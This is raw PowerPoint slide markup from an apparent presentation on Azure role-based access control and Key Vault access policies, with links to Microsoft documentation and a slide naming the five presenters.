              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>those</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>roles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="4572" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4572" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Azure AD built-in roles - Azure Active Directory | Microsoft Docs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4572" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nb-NO" sz="1600" dirty="0">
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4572" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>built</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>-in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>roles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> - Azure RBAC | Microsoft Docs</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600" b="1" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4572" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nb-NO" sz="1600" b="1" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4572" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nb-NO" sz="1400" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nb-NO" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="nb-NO" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D32CF48-664D-476A-A35F-C8BE8CB70DFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6437615" y="3862644"/>
            <a:ext cx="2939264" cy="2165592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5F0FFDC-C7A4-429C-A789-313A22654357}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8009754" y="3071739"/>
            <a:ext cx="3588974" cy="1792118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9821812-A968-4E46-9C90-78B187FCC2BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6138305" y="1434145"/>
            <a:ext cx="1787981" cy="1994855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3067011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76D72-3259-4B66-AA27-7879EFFEA612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Access Policy vs RBAC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45DED834-8167-44BB-94CC-315CFB2A00A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="667512" y="4204209"/>
            <a:ext cx="10716768" cy="1645920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lessons learned from both scenarios</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2810936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F683F-53F3-4402-A382-D2B9AC81D661}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882805" y="0"/>
            <a:ext cx="10515600" cy="1353802"/>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Who we are and what we do</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BB9C442-7F3E-4FDC-AA0C-454425CD0E8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="297590" y="1847842"/>
            <a:ext cx="2255462" cy="3713116"/>
            <a:chOff x="252985" y="2405033"/>
            <a:chExt cx="2255462" cy="3713116"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2058" name="Picture 10" descr="Sanna Diana Tomren">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91E9526A-2B1C-4039-9E79-3553FFE6BA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009" r="14507" b="-1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="252985" y="2962911"/>
              <a:ext cx="2255462" cy="31552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BD572C-532E-4A85-9305-34C9889F7742}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="400692" y="2405033"/>
              <a:ext cx="2107755" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Sanna Diana Tomren</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C5D5D5-7F3D-4BB6-AE5B-5C30F8991878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4982434" y="1847842"/>
            <a:ext cx="2342422" cy="3707637"/>
            <a:chOff x="4937829" y="2405033"/>
            <a:chExt cx="2342422" cy="3707637"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2052" name="Picture 4" descr="Linda Andersen">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF769B33-E8AD-4919-8379-8132390145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09" r="15007" b="-1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4937829" y="2957432"/>
              <a:ext cx="2255462" cy="315523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B589B8C-3734-4E2F-8095-4FD9164302F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5172496" y="2405033"/>
              <a:ext cx="2107755" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Linda Andersen </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC1E1EE1-4A43-48D7-8010-26E235E99715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7324856" y="1847842"/>
            <a:ext cx="2255462" cy="3707637"/>
            <a:chOff x="7280251" y="2405033"/>
            <a:chExt cx="2255462" cy="3707637"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2054" name="Picture 6" descr="Haflidi Fridthjofsson">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DBD7A2E-2815-4A5E-8AB8-75D5AD43E5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509" r="7007" b="-1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7280251" y="2957432"/>
              <a:ext cx="2255462" cy="31552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9E9822D-9077-4025-A2DC-A81197255253}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7427958" y="2405033"/>
              <a:ext cx="2107755" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Haflidi Fridthjofsson</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74AD0B85-4807-494E-B670-FBB09A7A79C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9667278" y="1847842"/>
            <a:ext cx="2255462" cy="3707637"/>
            <a:chOff x="9622673" y="2405033"/>
            <a:chExt cx="2255462" cy="3707637"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2056" name="Picture 8" descr="Craig Forshaw">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EDA05AA-052F-47C1-B31B-115E0E8AAF9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259" r="18257" b="-1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="9622673" y="2957432"/>
              <a:ext cx="2255462" cy="315523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FE36609-01FF-455C-890A-B2417CA22A93}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10031260" y="2405033"/>
              <a:ext cx="1696673" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Craig Forshaw</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{389E3232-0FA1-4C3B-B1F6-D30F9DA0F3F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2640012" y="1847842"/>
            <a:ext cx="2255462" cy="3707637"/>
            <a:chOff x="2595407" y="2405033"/>
            <a:chExt cx="2255462" cy="3707637"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="Picture 2" descr="Marius Sandbu">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BD160A2-3E7B-41B4-990A-CF7BCDCE13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634" r="10882" b="-1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2595407" y="2957431"/>
              <a:ext cx="2255462" cy="315523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B67294B-FFAE-4F1C-9EAC-2A9D8533E4A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2945955" y="2405033"/>
              <a:ext cx="1593706" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Marius </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>Sandbu</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198061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7B55-4CFA-E9D0-593E-6430452E716D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Role Based Access Control (RBAC) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Lessons learned with KeyVault (Access Policies vs RBAC)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B33D124-816C-85B3-358B-8AEB303FC645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="38" name="Table 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26B550AC-352F-4F6D-91E0-86DDEDE9889D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1519038605"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1323201" y="1801091"/>
          <a:ext cx="9335562" cy="3976774"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{69012ECD-51FC-41F1-AA8D-1B2483CD663E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4502728">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3764121505"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4832834">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1960372862"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="478520">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>Access Policy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nb-NO" dirty="0"/>
                        <a:t>RBAC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4974136"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3498254">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="nb-N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nb-N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8860526"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B2E625F-F178-73AD-1DD6-1D581D55B2C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6140415" y="2830524"/>
            <a:ext cx="4097749" cy="1869745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4828AF-9F7D-4DFD-BD8C-C060422C8FD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1493799" y="2464113"/>
            <a:ext cx="4226017" cy="2411527"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
